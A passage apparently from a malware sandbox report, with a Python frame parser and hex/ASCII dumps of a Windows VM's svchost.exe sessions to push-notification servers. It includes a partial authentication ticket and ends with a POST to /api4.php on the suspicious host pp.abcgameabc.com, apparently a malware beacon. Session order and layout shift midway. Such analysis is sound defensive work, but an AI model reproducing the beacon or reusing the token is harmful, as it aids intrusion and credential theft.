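        if buf and split_start_line(row.split(b"\r\n", 1)[0]) is not None:
            frames.extend(parse_frames(buf))
            buf = b""
        buf += row
    if buf:
        frames.extend(parse_frames(buf))
    return frames


# Session 10 as shown in the report: first row from its hex column, the rest re-typed
# from its Data Ascii column (the ATH row only as far as the report displays it).
ROW_CNT = from_hex_row("43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 "
                       "35 63 35 34 33 39 61 39 38 61 61 38 65 66 36 37 0d 0a 0d 0a")
ROW_CONNECT_XML = (b"<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer>"
                   b"<proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac>"
                   b"<deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>")
ROW_ATH = (b"ATH 2 CON\\DEVICE 1014\r\nContext: 5c5439a98aa8ef67\r\n\r\n<device><compact-ticket>"
           b"t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+"
           b"pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk")
ROW_BND = b"BND 3 CON\\QOS 29\r\nContext: 5c5439a98aa8ef67\r\n\r\n"
ROWS_IN = [b"202 1 CON 58\r\n", b"MS-CV: nbOOq/zCcEav/9erAMYLMw.0\r\n\r\nPayload parsing failed."]


def session_10_out() -> List[Frame]:
    return parse_rows([ROW_CNT, ROW_CONNECT_XML, ROW_ATH, ROW_BND])


def session_10_in() -> List[Frame]:
    return parse_rows(ROWS_IN)
```

Calling session_10_out() yields three frames: CNT complete with its 217-byte XML body and Context header, ATH with declared_len 1014 and a positive missing count (the bytes the report did not display), and BND complete with an empty body. session_10_in() yields the single 202 frame whose seq matches the CNT request and whose body is "Payload parsing failed.". To decode the other sessions, paste their Data Raw columns through from_hex_row in the same order.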


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
11         | 192.168.2.3 | 49763       | 20.199.120.182 | 443              | C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-11 08:18:46 UTC | 638 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 36 39 30 61 37 62 64 31 32 64 36 32 37 62 0d 0a 0d 0a
    Data Ascii: CNT 1 CON 246
                Context: 42690a7bd12d627b
2022-09-11 08:18:46 UTC | 638 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2022-09-11 08:18:46 UTC | 638 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 36 39 30 61 37 62 64 31 32 64 36 32 37 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
    Data Ascii: ATH 2 CON\DEVICE 1014
                Context: 42690a7bd12d627b
                <device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
2022-09-11 08:18:46 UTC | 639 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 36 39 30 61 37 62 64 31 32 64 36 32 37 62 0d 0a 0d 0a
    Data Ascii: BND 3 CON\QOS 29
                Context: 42690a7bd12d627b
2022-09-11 08:18:46 UTC | 639 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
    Data Ascii: 202 1 CON 58
2022-09-11 08:18:46 UTC | 639 | IN | Data Raw: 4d 53 2d 43 56 3a 20 70 54 61 48 57 4c 4a 48 4a 30 71 4e 31 41 45 78 4f 30 57 65 51 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
    Data Ascii: MS-CV: pTaHWLJHJ0qN1AExO0WeQg.0
                Payload parsing failed.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
12         | 192.168.2.3 | 49772       | 20.199.120.182 | 443              | C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-11 08:19:38 UTC | 639 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 33 32 37 30 36 35 61 33 35 37 39 36 34 66 62 0d 0a 0d 0a
    Data Ascii: CNT 1 CON 246
                Context: 9327065a357964fb
2022-09-11 08:19:38 UTC | 639 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2022-09-11 08:19:38 UTC | 640 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 33 32 37 30 36 35 61 33 35 37 39 36 34 66 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
    Data Ascii: ATH 2 CON\DEVICE 1014
                Context: 9327065a357964fb
                <device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
2022-09-11 08:19:38 UTC | 641 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 33 32 37 30 36 35 61 33 35 37 39 36 34 66 62 0d 0a 0d 0a
    Data Ascii: BND 3 CON\QOS 29
                Context: 9327065a357964fb
2022-09-11 08:19:38 UTC | 641 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
    Data Ascii: 202 1 CON 58
2022-09-11 08:19:38 UTC | 641 | IN | Data Raw: 4d 53 2d 43 56 3a 20 57 52 36 52 38 65 42 64 50 45 32 61 58 69 71 2b 55 33 6e 48 4a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
    Data Ascii: MS-CV: WR6R8eBdPE2aXiq+U3nHJg.0
                Payload parsing failed.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
13         | 192.168.2.3 | 49773       | 20.199.120.182 | 443              | C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-11 08:20:40 UTC | 641 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 31 30 39 33 30 35 37 37 66 64 63 34 66 39 0d 0a 0d 0a
    Data Ascii: CNT 1 CON 246
                Context: 7d10930577fdc4f9
2022-09-11 08:20:40 UTC | 641 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2022-09-11 08:20:40 UTC | 641 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 31 30 39 33 30 35 37 37 66 64 63 34 66 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
    Data Ascii: ATH 2 CON\DEVICE 1014
                Context: 7d10930577fdc4f9
                <device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
2022-09-11 08:20:40 UTC | 642 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 31 30 39 33 30 35 37 37 66 64 63 34 66 39 0d 0a 0d 0a
    Data Ascii: BND 3 CON\QOS 29
                Context: 7d10930577fdc4f9
2022-09-11 08:20:40 UTC | 642 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
    Data Ascii: 202 1 CON 58
2022-09-11 08:20:40 UTC | 642 | IN | Data Raw: 4d 53 2d 43 56 3a 20 58 33 34 47 4f 5a 6c 75 53 45 2b 2b 57 49 63 76 75 56 38 70 30 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
    Data Ascii: MS-CV: X34GOZluSE++WIcvuV8p0A.0
                Payload parsing failed.


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
2          | 192.168.2.3 | 49735       | 20.199.120.182 | 443              | C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-11 08:17:06 UTC | 625 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 31 63 34 34 62 65 33 34 33 31 64 61 61 0d 0a 0d 0a
    Data Ascii: CNT 1 CON 246
                Context: 5221c44be3431daa
2022-09-11 08:17:06 UTC | 625 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2022-09-11 08:17:06 UTC | 625 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 31 63 34 34 62 65 33 34 33 31 64 61 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
    Data Ascii: ATH 2 CON\DEVICE 1014
                Context: 5221c44be3431daa
                <device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
2022-09-11 08:17:06 UTC | 626 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 32 32 31 63 34 34 62 65 33 34 33 31 64 61 61 0d 0a 0d 0a
    Data Ascii: BND 3 CON\QOS 29
                Context: 5221c44be3431daa
2022-09-11 08:17:06 UTC | 626 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
    Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:06 UTC626INData Raw: 4d 53 2d 43 56 3a 20 6c 6c 37 77 47 31 50 46 56 30 61 68 51 61 73 44 70 34 57 78 64 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: ll7wG1PFV0ahQasDp4WxdA.0Payload parsing failed.


                                                          Session ID:3
                                                          Source IP:192.168.2.3
                                                          Source Port:49739
                                                          Destination IP:20.199.120.151
                                                          Destination Port:443
                                                          Process:C:\Windows\System32\svchost.exe
                                                          Timestamp  kBytes transferred  Direction  Data
                                                          2022-09-11 08:17:14 UTC626OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 62 66 64 63 35 63 30 37 37 32 38 63 35 36 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: fabfdc5c07728c56
                                                          2022-09-11 08:17:14 UTC626OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:17:14 UTC626OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 62 66 64 63 35 63 30 37 37 32 38 63 35 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: fabfdc5c07728c56<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:17:14 UTC627OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 61 62 66 64 63 35 63 30 37 37 32 38 63 35 36 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: fabfdc5c07728c56
                                                          2022-09-11 08:17:15 UTC628INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:15 UTC628INData Raw: 4d 53 2d 43 56 3a 20 37 4e 65 39 4a 36 52 6a 6f 6b 65 6b 41 2f 4e 64 4f 74 51 68 35 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: 7Ne9J6RjokekA/NdOtQh5A.0Payload parsing failed.


                                                          Session ID:4
                                                          Source IP:192.168.2.3
                                                          Source Port:49743
                                                          Destination IP:20.199.120.151
                                                          Destination Port:443
                                                          Process:C:\Windows\System32\svchost.exe
                                                          Timestamp  kBytes transferred  Direction  Data
                                                          2022-09-11 08:17:30 UTC628OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 38 37 37 33 62 39 61 38 34 65 30 34 66 39 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 188773b9a84e04f9
                                                          2022-09-11 08:17:30 UTC628OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:17:30 UTC628OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 38 37 37 33 62 39 61 38 34 65 30 34 66 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 188773b9a84e04f9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:17:30 UTC629OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 38 37 37 33 62 39 61 38 34 65 30 34 66 39 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 188773b9a84e04f9
                                                          2022-09-11 08:17:30 UTC629INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:30 UTC629INData Raw: 4d 53 2d 43 56 3a 20 76 37 53 6d 4e 66 79 35 6f 30 69 4a 39 31 56 42 33 72 33 54 55 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: v7SmNfy5o0iJ91VB3r3TUQ.0Payload parsing failed.


                                                          Session ID:5
                                                          Source IP:192.168.2.3
                                                          Source Port:49757
                                                          Destination IP:104.21.34.132
                                                          Destination Port:443
                                                          Process:C:\Windows\System32\svchost.exe
                                                          Timestamp  kBytes transferred  Direction  Data
                                                          2022-09-11 08:17:43 UTC629OUTPOST /api4.php HTTP/1.1
                                                          Accept: */*
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                          Host: pp.abcgameabc.com
                                                          Content-Length: 274
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
